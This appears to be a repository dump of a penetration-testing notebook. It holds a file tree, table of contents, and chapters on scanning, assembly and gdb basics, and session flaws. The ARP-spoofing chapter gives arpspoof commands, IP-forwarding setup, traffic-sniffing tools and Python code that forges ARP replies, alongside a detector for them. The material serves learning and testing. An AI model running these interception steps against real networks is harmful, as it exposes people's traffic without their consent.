├── .gitignore ├── README.md ├── SUMMARY.md ├── active_information_gathering.md ├── arp-spoofing.md ├── attacking_the_user.md ├── automated_vulnerability_scanners.md ├── bash-scripting.md ├── basics.md ├── basics_of_linux.md ├── basics_of_windows.md ├── binary_exploitation.md ├── binary_exploitation2.md ├── broken_authentication_or_session_management.md ├── browser_vulnerabilities.md ├── buffer_overflow_bof.md ├── bypass_image_upload.md ├── bypassing_antivirus.md ├── clean_up.md ├── clickjacking.md ├── cmd.md ├── commands.md ├── common_web-services.md ├── compiling-windows-exploits.md ├── connections.md ├── create_shellcode.md ├── creating_malicious_files.md ├── cross-site-scripting.md ├── cross_site_request_forgery.md ├── dGaQO6Y.png ├── database.md ├── default_layout_apache_on_different_versiont.md ├── dictionary_attacks.md ├── directory-traversal-attack.md ├── dns-spoofing.md ├── dns_basics.md ├── dns_zone_transfer_attack.md ├── dom-based-xss.md ├── editing-exploits.md ├── email_harvesting.md ├── escaping_restricted_shell.md ├── example_of_company_architecture.md ├── examplesXSS.md ├── exploit-examples_2.md ├── exploit_examples_and_tutorials.md ├── exploiting.md ├── exploits.md ├── exposed_version_control.md ├── failure-to-restrict-url-access.md ├── find_subdomains.md ├── finding_subdomains.md ├── firewalls.md ├── fss.jpg ├── function1-stackframe.png ├── function1.png ├── general_tips.md ├── generate_custom_wordlist.md ├── getting_meterpreter_shell.md ├── google_hacking.md ├── hashcat.md ├── host-header-attack.md ├── html-injection.md ├── identify_hash_and_crack_it.md ├── identifying-technology-stack.md ├── immunity_debugger.md ├── insecure-direct-object-reference-idor.md ├── java_applet.md ├── lead_to_compromise.md ├── linux.md ├── list_of_common_ports.md ├── littearature.md ├── local_file_inclusion.md ├── loot.md ├── loot_windows_-_for_credentials_and_other_stuff.md ├── main-stackframe.png ├── metasploit.md ├── meterpreter.md ├── modules.md ├── 
msfvenom---create-shellcode.md ├── netcat.md ├── network_traffic.md ├── networking.md ├── nosql-injections.md ├── online_password_cracking.md ├── oscp.md ├── pass_the_hash_-_reusing_hashes.md ├── passive_information_gatherig.md ├── password-cracking.md ├── payloads.md ├── persistence.md ├── physical_access_to_machine.md ├── pivoting.md ├── port_forwarding_and_tunneling.md ├── port_knocking.md ├── port_scanning.md ├── post_exploitation.md ├── powershell.md ├── powershell_scripting2.md ├── privilege-escalation-powershell.md ├── privilege_escalation_-_linux.md ├── privilege_escalation_windows.md ├── python_fundamentals.md ├── random-stuff.md ├── recon-ng.md ├── remote_file_inclusion.md ├── reverse-shell.md ├── scanning.md ├── scripting_with_python.md ├── server-side-vulnerabilities.md ├── session-fixation.md ├── setuid_c-code.md ├── smtp-user-enum.md ├── social_engineering_-_phishing.md ├── spawning_shells.md ├── sql-injections.md ├── ssl-strip.md ├── styles ├── ebook.css ├── print.css └── website.css ├── subdomain_takeover.md ├── tcp-dumps_on_pwnd_machines.md ├── text-injection.md ├── the_basics.md ├── tips.md ├── tools.md ├── tools_of_the_trade.md ├── transfering_files.md ├── transfering_files2.md ├── transfering_files_to_windows.md ├── users.md ├── vim.md ├── vulnerabilities.md ├── vulnerability_analysi.md ├── vulnerability_analysi1s.md ├── vulnerability_analysis.md ├── waf_-_web_application_firewall.md ├── web-scanning.md ├── web-services.md ├── webshell.md ├── wep.md ├── wget.md ├── wifi.md ├── windows.md ├── windows_exploitation.md ├── wireshark.md ├── wps.md ├── write_exploits.md └── xml_external_entity_attack.md

--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------

```
# Node rules:
## Grunt intermediate storage (http://gruntjs.com/creating-plugins#storing-task-files)
.grunt

## Dependency directory
## Commenting this out is preferred by some people, see
## https://docs.npmjs.com/misc/faq#should-i-check-my-node_modules-folder-into-git
node_modules

# Book build output
_book

# eBook build output
*.epub
*.mobi
*.pdf
```

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------

# IT-Security

My notepad about stuff related to IT-security, and specifically penetration testing. Stuff I have come across that I don't feel like googling again.

I have used this book to try to write down how some things work, but at the same time I want to use it as a reference book to find commands and things I just can't remember. Therefore I have tried to create a TLDR section at the beginning of some chapters with copy-paste-ready commands that are useful. If you want to know more you can continue to read the rest of the chapter. This is my way of making the book a hybrid between the Red Team Field Manual and a standard introduction book to pentesting.

Also, this book is just a collection of stuff that is available on the interwebz. I am just a simple collector. I have tried to include a reference section to show where I found each technique. This book is my way of trying to give something back to the infosec community, and I hope it can be useful to someone.

You can read this book on [https://pha5matis.gitbooks.io/netsec/content/](https://pha5matis.gitbooks.io/netsec/content/). If you feel like contributing, or just forking it, you can do that from its GitHub repo: [https://github.com/pha5matis/Pentesting-Guide](https://github.com/pha5matis/Pentesting-Guide). If you feel this is a good start but want to add and remove things and just make it yours, fork it and do whatever you want with it.
## Find practical examples

If you read about a vulnerability that you want to know more about, I can really recommend searching for it on HackerOne via Google. It is a good way to find real-life examples of vulnerabilities.

Here is an example of such a search:

```
site:hackerone.com sql-injection
```

## Disclaimers

Sometimes the line between the chapters isn't very clear. Some actions might be considered part of the vulnerability analysis phase, but they could also be considered part of the recon phase. It is what it is.

Use at your own risk.

--------------------------------------------------------------------------------
/SUMMARY.md:
--------------------------------------------------------------------------------

# Summary

* [Introduction](README.md)
* [The Basics](the_basics.md)
    * [Linux](linux.md)
        * [Basics of Linux](basics_of_linux.md)
        * [Bash-scripting](bash-scripting.md)
        * [Vim](vim.md)
    * [Windows](windows.md)
        * [Basics of Windows](basics_of_windows.md)
        * [PowerShell](powershell.md)
        * [PowerShell Scripting](powershell_scripting2.md)
        * [CMD](cmd.md)
    * [Scripting With Python](scripting_with_python.md)
        * [Python Fundamentals](python_fundamentals.md)
        * [Useful Scripts](connections.md)
    * [Transferring Files](transfering_files2.md)
        * [Transferring Files on Linux](transfering_files.md)
        * [Transferring files on Windows](transfering_files_to_windows.md)
    * [Firewalls](firewalls.md)
    * [General tips and tricks](general_tips.md)
* [Recon and Information Gathering Phase](scanning.md)
    * [Passive Information Gathering](passive_information_gatherig.md)
        * Identify IP-addresses and Subdomains
            * Identify IP-addresses
            * [Find Subdomains](find_subdomains.md)
                * [DNS Basics](dns_basics.md)
                * [Finding subdomains](finding_subdomains.md)
                * [DNS Zone Transfer Attack](dns_zone_transfer_attack.md)
        * [Identifying People](email_harvesting.md)
        * [Search Engine Discovery](google_hacking.md)
        * [Identifying Technology Stack](identifying-technology-stack.md)
    * [Active Information Gathering](active_information_gathering.md)
        * [Port Scanning](port_scanning.md)
* [Vulnerability analysis](vulnerability_analysi1s.md)
    * [Non-HTTP Vulnerabilities](server-side-vulnerabilities.md)
        * [Common ports\/services and how to use them](list_of_common_ports.md)
        * [Port Knocking](port_knocking.md)
    * [HTTP - Web Vulnerabilities](web-services.md)
        * [Common Web-services](common_web-services.md)
        * [WAF - Web Application Firewall](waf_-_web_application_firewall.md)
        * [Attacking the System](lead_to_compromise.md)
            * [Local File Inclusion](local_file_inclusion.md)
            * [Remote File Inclusion](remote_file_inclusion.md)
            * [Directory Traversal Attack](directory-traversal-attack.md)
            * [Hidden Files and Directories](web-scanning.md)
            * [SQL-Injections](sql-injections.md)
            * [Nosql-Injections](nosql-injections.md)
            * [XML External Entity Attack](xml_external_entity_attack.md)
            * [Bypass File Upload Filtering](bypass_image_upload.md)
            * [Exposed Version Control](exposed_version_control.md)
            * Directory Traversal Attack
            * [Host Header Attack](host-header-attack.md)
        * [Attacking the User](attacking_the_user.md)
            * [Clickjacking](clickjacking.md)
            * [Broken Authentication or Session Management](broken_authentication_or_session_management.md)
            * [Text/content-injection](text-injection.md)
            * [HTML-Injection](html-injection.md)
            * [Insecure Direct Object Reference \(IDOR\)](insecure-direct-object-reference-idor.md)
            * [Subdomain Takeover](subdomain_takeover.md)
            * [Cross Site Request Forgery](cross_site_request_forgery.md)
            * [Cross-Site Scripting](cross-site-scripting.md)
                * [Examples](examplesXSS.md)
                * [DOM-based XSS](dom-based-xss.md)
            * [Browser Vulnerabilities](browser_vulnerabilities.md)
            * HTML-Injection
            * [Session Fixation](session-fixation.md)
    * [Automated Vulnerability Scanners](automated_vulnerability_scanners.md)
* [Exploiting](exploiting.md)
    * [Social Engineering - Phishing](social_engineering_-_phishing.md)
    * [Default Layout of Apache on Different Versions](default_layout_apache_on_different_versiont.md)
    * [Shells](reverse-shell.md)
        * [Webshell](webshell.md)
    * [Generate Shellcode](create_shellcode.md)
    * [Editing Exploits](editing-exploits.md)
    * [Compiling windows exploits](compiling-windows-exploits.md)
* [Post Exploitation](post_exploitation.md)
    * [Spawning Shells](spawning_shells.md)
    * [Meterpreter for Post-Exploitation](getting_meterpreter_shell.md)
    * [Privilege Escalation - Linux](privilege_escalation_-_linux.md)
    * [Privilege Escalation - Windows](privilege_escalation_windows.md)
    * [Privilege Escalation - Powershell](privilege-escalation-powershell.md)
    * [Escaping Restricted Shell](escaping_restricted_shell.md)
    * [Bypassing antivirus](bypassing_antivirus.md)
    * [Loot and Enumerate](loot.md)
        * [Loot Windows](loot_windows_-_for_credentials_and_other_stuff.md)
        * [Loot Linux](tcp-dumps_on_pwnd_machines.md)
    * [Persistence](persistence.md)
    * [Cover your tracks](clean_up.md)
* [Password Cracking](password-cracking.md)
    * [Generate Custom Wordlist](generate_custom_wordlist.md)
    * [Offline Password Cracking](identify_hash_and_crack_it.md)
    * [Online Password Cracking](online_password_cracking.md)
    * [Pass the Hash - Reusing Hashes](pass_the_hash_-_reusing_hashes.md)
* [Pivoting - Port forwarding - Tunneling](port_forwarding_and_tunneling.md)
* [Network traffic analysis](network_traffic.md)
    * [Arp-spoofing](arp-spoofing.md)
    * [SSL-strip](ssl-strip.md)
    * [DNS-spoofing](dns-spoofing.md)
    * [Wireshark](wireshark.md)
* [Wifi](wifi.md)
    * [WEP](wep.md)
    * [WPS](wps.md)
* [Physical access to machine](physical_access_to_machine.md)
* [Literature](littearature.md)

--------------------------------------------------------------------------------
/active_information_gathering.md:
--------------------------------------------------------------------------------

# Active information gathering

Once the passive phase is over it is time to move to the active phase. In this phase we start interacting with the target, so from here on everything we do leaves traces in the target's logs.

## Netdiscover

This tool is used to scan a network for live machines. It works by sending ARP requests, so it only finds hosts on the local network segment.

```
netdiscover -r 192.168.1.1/24
```

## Nikto

Nikto is a good tool to scan web servers. It is very intrusive: it sends thousands of requests and is easily spotted in logs or by a WAF.

```
nikto -host 192.168.1.101
```

## References

https://blog.bugcrowd.com/discovering-subdomains

https://high54security.blogspot.cl/2016/01/recon-ng-and-power-to-crawl-trough.html

--------------------------------------------------------------------------------
/arp-spoofing.md:
--------------------------------------------------------------------------------

# Arp-spoofing - Sniffing traffic

## Step 1

Run nmap or netdiscover to list the devices on the network:
`netdiscover -r 192.168.1.0/24`, or whatever network range it is. Netdiscover is good because it is live: it updates as soon as new devices connect to the network.

```
nmap -vvv 192.168.1.0/24
```

## Step 2

```
echo 1 > /proc/sys/net/ipv4/ip_forward
```

This command is fundamental. Without setting it to `1` your machine will receive the victim's traffic but not forward it, so the victim's connection goes down: a denial of service. If that is what you want, make sure it is set to `0`. If you want to intercept the traffic and pass it on, make sure it is set to `1`.
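Before running arpspoof in the next step it helps to see exactly what the tool puts on the wire: a stream of forged ARP replies claiming that some IP lives at your MAC address. The following Python example is added here and is not part of the original notes. It builds such a reply with `struct` (the same bytes arpspoof sends, minus the timing), parses it back, and runs a small detector over a constructed capture that shows how a defender, or you checking that your own poisoning works, can spot the attack: one IP claimed by two different MACs. All MAC and IP addresses are made up.

```python
"""ARP spoofing on the wire: forged replies and how to detect them.

Added example, not part of the original notes. The frames built here are
the Ethernet/ARP replies that `arpspoof -t <target> <host>` repeats every
few seconds; the detector looks for one IP advertised by two sender MACs.
"""
import socket
import struct
from collections import defaultdict

ETH_P_ARP = 0x0806
ARP_REPLY = 2
ARP_FMT = "!HHBBH6s4s6s4s"  # hw type, proto type, hw len, proto len, op, smac, sip, tmac, tip


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(sender_mac: str, sender_ip: str,
                    target_mac: str, target_ip: str) -> bytes:
    """Ethernet header + ARP reply saying "sender_ip is at sender_mac".

    For `arpspoof -t 192.168.1.1 192.168.1.105` the target is the router,
    sender_ip is the victim's address and sender_mac is the attacker's MAC.
    """
    eth = struct.pack("!6s6sH", mac_bytes(target_mac), mac_bytes(sender_mac), ETH_P_ARP)
    arp = struct.pack(ARP_FMT,
                      1,        # hardware type: Ethernet
                      0x0800,   # protocol type: IPv4
                      6, 4,     # hardware / protocol address lengths
                      ARP_REPLY,
                      mac_bytes(sender_mac), socket.inet_aton(sender_ip),
                      mac_bytes(target_mac), socket.inet_aton(target_ip))
    return eth + arp


def parse_arp(frame: bytes):
    """Return the ARP fields of a frame as a dict, or None if it is not ARP."""
    if len(frame) < 42 or struct.unpack_from("!H", frame, 12)[0] != ETH_P_ARP:
        return None
    _, _, _, _, op, smac, sip, tmac, tip = struct.unpack_from(ARP_FMT, frame, 14)
    return {"op": op,
            "sender_mac": mac_str(smac), "sender_ip": socket.inet_ntoa(sip),
            "target_mac": mac_str(tmac), "target_ip": socket.inet_ntoa(tip)}


def detect_arp_spoof(frames) -> dict:
    """Map each IP that was claimed by more than one MAC to the set of MACs.

    A host legitimately answers for its own IP only, so the same IP arriving
    with two different sender MACs is the signature of cache poisoning.
    """
    claims = defaultdict(set)
    for frame in frames:
        arp = parse_arp(frame)
        if arp and arp["op"] == ARP_REPLY:
            claims[arp["sender_ip"]].add(arp["sender_mac"])
    return {ip: macs for ip, macs in claims.items() if len(macs) > 1}


# Constructed capture (made-up addresses): a genuine reply from the router,
# a genuine reply from the victim, then the two forged replies that a
# bidirectional arpspoof run (one instance per direction) produces.
ROUTER_MAC, VICTIM_MAC, ATTACKER_MAC = "02:00:00:00:00:01", "02:00:00:00:00:69", "02:00:00:00:00:aa"
ROUTER_IP, VICTIM_IP = "192.168.1.1", "192.168.1.105"

SAMPLE_CAPTURE = [
    build_arp_reply(ROUTER_MAC, ROUTER_IP, VICTIM_MAC, VICTIM_IP),    # genuine
    build_arp_reply(VICTIM_MAC, VICTIM_IP, ROUTER_MAC, ROUTER_IP),    # genuine
    build_arp_reply(ATTACKER_MAC, ROUTER_IP, VICTIM_MAC, VICTIM_IP),  # arpspoof -t victim router
    build_arp_reply(ATTACKER_MAC, VICTIM_IP, ROUTER_MAC, ROUTER_IP),  # arpspoof -t router victim
]

if __name__ == "__main__":
    for ip, macs in detect_arp_spoof(SAMPLE_CAPTURE).items():
        print(f"{ip} is claimed by {sorted(macs)}")
```

To run the detector against real traffic, feed it the raw frames from a pcap (for instance the output of the tcpdump capture in step 4) instead of `SAMPLE_CAPTURE`; the two genuine replies show why a single IP-to-MAC mapping is never a finding on its own.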
## Step 3

```
arpspoof -i wlan0 -t 192.168.1.1 192.168.1.105
```

- `-i` is the interface flag. In this example we choose the wlan0 interface. Run `ifconfig` to see which interfaces you have available.
- `-t` is the target flag: the host whose ARP cache gets poisoned. The last argument is the host you pretend to be. So here the router (192.168.1.1) is told that 192.168.1.105 lives at your MAC address, and everything the router sends to that device ends up with you instead.

That only diverts one direction of the conversation. To also see what the device sends to the router, run a second arpspoof with the two addresses swapped, so the device is told that the router is at your MAC address.

## Step 4 - Read the traffic

So now you are intercepting the traffic. You have a few choices for how to read it.

urlsnarf outputs every URL it sees:

```
urlsnarf -i wlan0
```

Driftnet is pretty cool. It shows you all the images loaded in the target's browser in real time. Not very useful, but kind of cool:

```
driftnet -i wlan0
```

- Wireshark: just open Wireshark, select the interface and start capturing.
- tcpdump: also awesome.

Keep in mind that only plaintext protocols are readable this way. HTTPS traffic still flows through you, but it stays encrypted (see the SSL-strip chapter).

--------------------------------------------------------------------------------
/attacking_the_user.md:
--------------------------------------------------------------------------------

# Attacking the user

In this section we focus on vectors that attack the user. These kinds of vulnerabilities seem to be popular in bug bounties.

--------------------------------------------------------------------------------
/automated_vulnerability_scanners.md:
--------------------------------------------------------------------------------

# Automated Vulnerability Scanners

Everyone on the interwebz who says they know something about pentesting will talk shit about Nessus and say that it is for lazy pentesters, that it creates too much noise, and that it produces too many false positives. That may be true, I don't know. But from a learning perspective it can be really great. It can help to show you what kind of vulnerabilities are out there. So whatever, do what you want.
## Server side scanning

### Nessus

Register and download it here:
http://www.tenable.com/products/nessus-home

Then install the package:

```
dpkg -i nameOfFile
```

Start it:

```
/etc/init.d/nessusd start
```

The web interface then listens on https://127.0.0.1:8834.

### Nmap Scripting Engine

On Kali the scripts are found at:

```
/usr/share/nmap/scripts
```

To see what a category does:

```
nmap --script-help default
```

Or for a specific script:

```
nmap --script-help nameOfScript
```

Run all default scripts together with a port scan. Some scripts can crash certain services, causing a denial of service, so never run the intrusive ones against production servers without agreement:

```
nmap -sC 192.168.1.101
```

Nmap has sorted its scripts into categories to make it easy to run a group of them together:

```
auth
broadcast
default
discovery
dos
exploit
external
fuzzer
intrusive
malware
safe
version
vuln
```

`-sC` only runs the default category; any other category is selected with `--script`. So if you want to run all the vuln scripts you do:

```
nmap --script vuln 192.168.1.10
```

### OpenVas

OpenVas is another popular open-source vulnerability scanner.

If you are on Kali Linux you first have to run the initial setup script:

```
openvas-setup
```

Make sure to write down the password that the initialisation script gives you.

This will download some stuff and start setting everything up. When everything is set up you go to the web interface:

```
https://127.0.0.1:9392/login/login.html
```

### Metasploit Scanner Module

## Web Application Scanner

### Nikto

```
nikto -h example.com
```

### Uniscan

`-h` only prints Uniscan's help; the target URL is given with `-u`, and the letters after it select the checks (directory, file, robots.txt/sitemap, dynamic and static):

```
uniscan -u http://192.168.1.102/ -qweds
```

### Metasploit - WMAP

The web scanner plugin inside metasploit is called wmap:

```
load wmap
help
```

Read more here:
https://www.offensive-security.com/metasploit-unleashed/wmap-web-scanner/

--------------------------------------------------------------------------------
/bash-scripting.md:
--------------------------------------------------------------------------------

# Bash-scripting

## Iterate over a file

This script will iterate over a file and echo out every single line. Note that `$(cat ...)` splits on every whitespace character, not only on newlines, so a line containing spaces comes out as several "lines", and any `*` in the file gets glob-expanded:

```bash
#!/bin/bash

for line in $(cat file.txt);do
    echo $line
done
```

Another way of writing it, which keeps every line intact, is this:

```bash
#!/bin/bash

while read -r p; do
    echo "$p"
done < file.txt
```

--------------------------------------------------------------------------------

Take a small C program that prints a line ten times:

```c
#include <stdio.h>

int main(){

    for (size_t i = 0; i < 10; i++) {
        puts("Hello world");
    }

    return 0;
}
```

So we have written a program in C and then compiled it. Now we want to look at the assembly code to see what code is actually going to be run by the machine.

```
objdump -D programName
```

This will give us some crazy output like this:

```assembly
00000000004004e6 <main>:
  4004e6:       55                      push   %rbp
  4004e7:       48 89 e5                mov    %rsp,%rbp
  4004ea:       48 83 ec 10             sub    $0x10,%rsp
  4004ee:       48 c7 45 f8 00 00 00    movq   $0x0,-0x8(%rbp)
  4004f5:       00
  4004f6:       eb 0f                   jmp    400507 <main+0x21>
  4004f8:       bf a4 05 40 00          mov    $0x4005a4,%edi
  4004fd:       e8 be fe ff ff          callq  4003c0 <puts@plt>
  400502:       48 83 45 f8 01          addq   $0x1,-0x8(%rbp)
  400507:       48 83 7d f8 09          cmpq   $0x9,-0x8(%rbp)
  40050c:       76 ea                   jbe    4004f8 <main+0x12>
  40050e:       b8 00 00 00 00          mov    $0x0,%eax
  400513:       c9                      leaveq
  400514:       c3                      retq
  400515:       66 2e 0f 1f 84 00 00    nopw   %cs:0x0(%rax,%rax,1)
  40051c:       00 00 00
  40051f:       90                      nop
```

This is just the part about the main function of the program. The output is a lot longer, but the rest is not interesting to us right now.

`00000000004004e6` is a place in memory, an address. It could be written in base 10 and it would still be the same address, but by convention addresses are written in hexadecimal. This one has 16 hex digits because each hex digit carries 4 bits and the binary is 64-bit: a 64-bit process can address 2^64 (about 1.84 × 10^19) bytes.

On the first line after the main label we see the number 55. All these numbers are machine code, written in hexadecimal instead of binary (01010101). The mnemonics to the right of the numbers are the same instructions written in assembly, so that we humans can read them a bit more easily. Instead of having to remember that 90 means nop, we just have to remember nop. That makes machine code a lot easier to understand.

So instead of memorizing `10010000` it is written as `90` in hexadecimal, and instead of remembering `90` we just remember `nop`. Pretty great. In the end they mean the same thing; they are just represented in three different ways.
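To make the "three representations of the same thing" concrete, here is a tiny decoder for the bytes of `main()` above. It is an added example, not code from the original notes: it takes the hex column of the listing and turns it back into mnemonics, and it computes the targets of `jmp`, `jbe` and `call` from the relative displacement that is actually stored in the bytes (the listing shows the absolute address, but the instruction only stores the distance from the next instruction). It only knows the handful of x86-64 encodings that occur in this one function, and it prints Intel syntax (destination first), which the next section explains.

```python
"""Decode the machine code of main() from the objdump listing above.

Added example, not from the original notes. Handles only the x86-64
encodings that occur in that listing; enough to show how hex bytes map to
mnemonics and how relative jump/call targets are resolved.
"""
import struct

REG64 = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
GROUP1 = {0: "add", 5: "sub", 7: "cmp"}   # /r field selects the operation for opcode 0x83


def modrm(byte: int):
    """Split a ModRM byte into (mod, reg, rm)."""
    return byte >> 6, (byte >> 3) & 7, byte & 7


def decode_one(code: bytes, i: int, addr: int):
    """Decode the instruction at code[i], loaded at addr; return (length, text)."""
    b = code[i]
    if b == 0x55:
        return 1, "push rbp"
    if b == 0x90:
        return 1, "nop"
    if b == 0xc9:
        return 1, "leave"
    if b == 0xc3:
        return 1, "ret"
    if b in (0xeb, 0x76):                       # jmp / jbe with signed 8-bit displacement
        rel = struct.unpack_from("<b", code, i + 1)[0]
        # The displacement is relative to the *next* instruction (addr + 2).
        return 2, f"{'jmp' if b == 0xeb else 'jbe'} {addr + 2 + rel:#x}"
    if b == 0xe8:                               # call with signed 32-bit displacement
        rel = struct.unpack_from("<i", code, i + 1)[0]
        return 5, f"call {addr + 5 + rel:#x}"
    if 0xb8 <= b <= 0xbf:                       # mov r32, imm32 (register is in the opcode)
        imm = struct.unpack_from("<I", code, i + 1)[0]
        return 5, f"mov {REG32[b - 0xb8]},{imm:#x}"
    if b == 0x48:                               # REX.W prefix: 64-bit operands follow
        op = code[i + 1]
        mod, reg, rm = modrm(code[i + 2])
        if op == 0x89 and mod == 3:             # mov r64, r64
            return 3, f"mov {REG64[rm]},{REG64[reg]}"
        if op == 0x83 and mod == 3:             # add/sub/cmp r64, imm8
            imm = struct.unpack_from("<b", code, i + 3)[0]
            return 4, f"{GROUP1[reg]} {REG64[rm]},{imm:#x}"
        if op == 0x83 and mod == 1:             # add/sub/cmp [r64+disp8], imm8
            disp, imm = struct.unpack_from("<bb", code, i + 3)
            return 5, f"{GROUP1[reg]} QWORD PTR [{REG64[rm]}{disp:+#x}],{imm:#x}"
        if op == 0xc7 and mod == 1:             # mov [r64+disp8], imm32
            disp = struct.unpack_from("<b", code, i + 3)[0]
            imm = struct.unpack_from("<i", code, i + 4)[0]
            return 8, f"mov QWORD PTR [{REG64[rm]}{disp:+#x}],{imm:#x}"
    raise ValueError(f"unsupported opcode {b:#x} at {addr:#x}")


def disassemble(code: bytes, base: int):
    """Return [(address, instruction)] in Intel syntax for the whole buffer."""
    out, i = [], 0
    while i < len(code):
        length, text = decode_one(code, i, base + i)
        out.append((base + i, text))
        i += length
    return out


# The hex column of main() copied from the objdump output above (nopw padding left out).
MAIN_BASE = 0x4004e6
MAIN_BYTES = bytes.fromhex(
    "55 48 89 e5 48 83 ec 10 48 c7 45 f8 00 00 00 00 eb 0f bf a4 05 40 00 "
    "e8 be fe ff ff 48 83 45 f8 01 48 83 7d f8 09 76 ea b8 00 00 00 00 c9 c3"
)

if __name__ == "__main__":
    for addr, text in disassemble(MAIN_BYTES, MAIN_BASE):
        print(f"{addr:x}: {text}")
```

Two details worth noticing in the output: `76 ea` at 0x40050c decodes to `jbe 0x4004f8` because 0xea is -22 and 0x40050e - 22 = 0x4004f8, and `e8 be fe ff ff` becomes `call 0x4003c0` by the same rule with a 32-bit displacement. A real disassembler (objdump, gdb, radare2) does exactly this over the full opcode map.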
### AT&T syntax or Intel syntax

There are two common ways of writing assembly: AT&T syntax and Intel syntax. AT&T is the default in the GNU tools on Linux, so the objdump output above is AT&T. You can tell by all the `$` and `%` signs, and by the operand order: AT&T writes the source before the destination. If you add `-M intel` to the objdump command you get Intel syntax instead (destination first, no sigils). In the end it doesn't really matter, tomato tomato.

We can set the syntax in gdb with the following command:

```
set disassembly-flavor intel
```

### Registers

The processor in your computer has something called registers. Registers are like internal variables of the processor. They are predefined, in the sense that you can't create registers; they are already there. You can think of them as micro-memories, or just variables. The processor uses them to make things fast: instead of looking up a specific place in memory it works on its own micro-memory. A 32-bit x86 processor has 8 general-purpose registers; x86-64 widens them to 64 bits and adds r8 to r15, which makes 16. So it is not that much to remember. The names differ between 64-bit and 32-bit: the 32-bit names start with `e` (eax, ebp, esp, eip) and the 64-bit ones with `r` (rax, rbp, rsp, rip). A 64-bit processor can run 32-bit binaries, but a 32-bit processor can't run 64-bit binaries. To find out what type a binary is you just type:

```
file binaryName
```

These are the names of the 32-bit registers, divided into sub-groups.

**General registers**
These registers are mainly used as temporary memory for the processor.

EAX - Accumulator

EBX - Base

ECX - Counter

EDX - Data

**Index and pointers**

ESI - Source index

EDI - Destination index

EBP - Base pointer - Holds an address: the base of the current function's stack frame.
EIP - Instruction pointer. Like a child pointing a finger at each word while reading a book, the instruction pointer is that finger: it always points to the instruction the processor is about to execute. This is an important pointer; getting control of it is the goal of most memory corruption exploits.

ESP - Stack pointer - Also holds an address: the current top of the stack.

**Segment registers**
CS, DS, ES, FS, GS, SS

**Indicator**
EFLAGS

So let's take a look at them in a real program. Let's run the program above, but this time under a debugger, the GNU Debugger:

```
gdb -q ./myprogram
```

First we set a breakpoint with the command `break main`. gdb places it after the function prologue, which is why it stops at 0x4004ea, the `sub $0x10,%rsp` in the listing above, and not at the first byte of main. Then we type `info registers` to see what we have in our registers. The binary is 64-bit, so the register names start with `r` here:

```
Breakpoint 1, 0x00000000004004ea in main ()
(gdb) info registers
#### General registers
rax            0x4004e6            4195558
rbx            0x0                 0
rcx            0x0                 0
rdx            0x7fffffffe798      140737488349080

#### Index and pointers
rsi            0x7fffffffe788      140737488349064
rdi            0x1                 1
rbp            0x7fffffffe6a0      0x7fffffffe6a0
rsp            0x7fffffffe6a0      0x7fffffffe6a0
r8             0x400590            4195728
r9             0x7ffff7dea6d0      140737351952080
r10            0x83e               2110
r11            0x7ffff7a57520      140737348203808
r12            0x4003f0            4195312
r13            0x7fffffffe780      140737488349056
r14            0x0                 0
r15            0x0                 0
rip            0x4004ea            0x4004ea

#### Indicator
eflags         0x246               [ PF ZF IF ]

#### Segment registers
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
```

Notice that rbp and rsp are equal: the prologue's `mov %rsp,%rbp` has just run and the `sub` that reserves space for the loop counter has not executed yet. rip holds the breakpoint address.

So hexadecimal is used as a way to represent binary out of convenience.
Assembly is written in the following form (Intel syntax):

```
mnemonic destination,source
```

The mnemonics are instructions like mov, push, sub. Destination and source are registers, addresses in memory, or immediate values. Note that the objdump listing above is in AT&T syntax, which puts the source first: `mov %rsp,%rbp` there is the same instruction as `mov rbp,rsp` here.

### Mnemonics

```assembly
mov rbp,rsp
```

Here we copy the current value of rsp (the stack pointer) into rbp (the base pointer). This is the standard start of a function: the base pointer now marks where this function's stack frame begins.

```
sub rsp,0x10
```

Read: subtract 0x10 from rsp. The stack pointer is now what it was before minus 0x10, which reserves 16 bytes on the stack for the function's local variables (the loop counter `i` lives at rbp-0x8).

```
add/inc ;add or increment
```

#### Flow control

```
cmp ; compare two values and set the flags accordingly.
jmp ; jump to a different part of the program.
```

For example:

```
cmp QWORD PTR [rbp-0x8],0x9
jbe 4004f8
```

Here we compare the 8-byte value at rbp-0x8, which is the loop counter `i`, with 0x9. **jbe** stands for "jump if below or equal", an unsigned comparison (matching the `size_t` in the C source). The address **4004f8** is the start of the loop body. So as long as `i <= 9` the jump is taken and the body (`puts`, then `add ... 0x1`) runs again; once `i` reaches 10 the jump is not taken, execution falls through to `mov eax,0x0` and the function returns. The `jmp 400507` before the body skips straight to this comparison the first time through, which is how the compiler lays out a `for` loop.

## Vulnerable functions

### access()

From the Notes section of the man page:

Warning: Using access() to check if a user is authorized to, for example, open a file before actually doing so using open(2) creates a security hole, because the user might exploit the short time interval between checking and opening the file to manipulate it. For this reason, the use of this system call should be avoided. (In the example just described, a safer alternative would be to temporarily switch the process's effective user ID to the real ID and then call open(2).)
http://linux.die.net/man/2/access

--------------------------------------------------------------------------------
/broken_authentication_or_session_management.md:
--------------------------------------------------------------------------------

# Broken Authentication or Session Management

### Authentication

### Logout management

* Log out in one tab but you stay logged in in another tab.

* Click on log out and then go back in your browser. If you land in the session again, that is a problem.

### Session management

##### Session does not die after password reset

https://hackerone.com/reports/145430

##### Cookie is usable after session is killed

Save the cookie, log out, and then inject the saved cookie into a new request. If you get back into the session you have an issue: the cookie was cleared on the client side but the session was never invalidated on the server side.

##### HttpOnly

HttpOnly is an optional flag in the Set-Cookie response header. If the flag is set, JavaScript cannot read the cookie, which limits what an XSS can do: it cannot steal the session cookie, although it can still send requests that carry it. HttpOnly only works if the browser honors the flag, but all current browsers do. You can see this behaviour if you open the devtools in your browser, go to the storage tab and look at the cookies. Then run

`console.log(document.cookie)`

and it will only print the cookies that do *not* have the HttpOnly flag set.

##### Secure flag

This is another optional flag for cookies, set by the application server. With this flag the browser will only send the cookie over HTTPS, never in plaintext.

##### Session-ID in URL

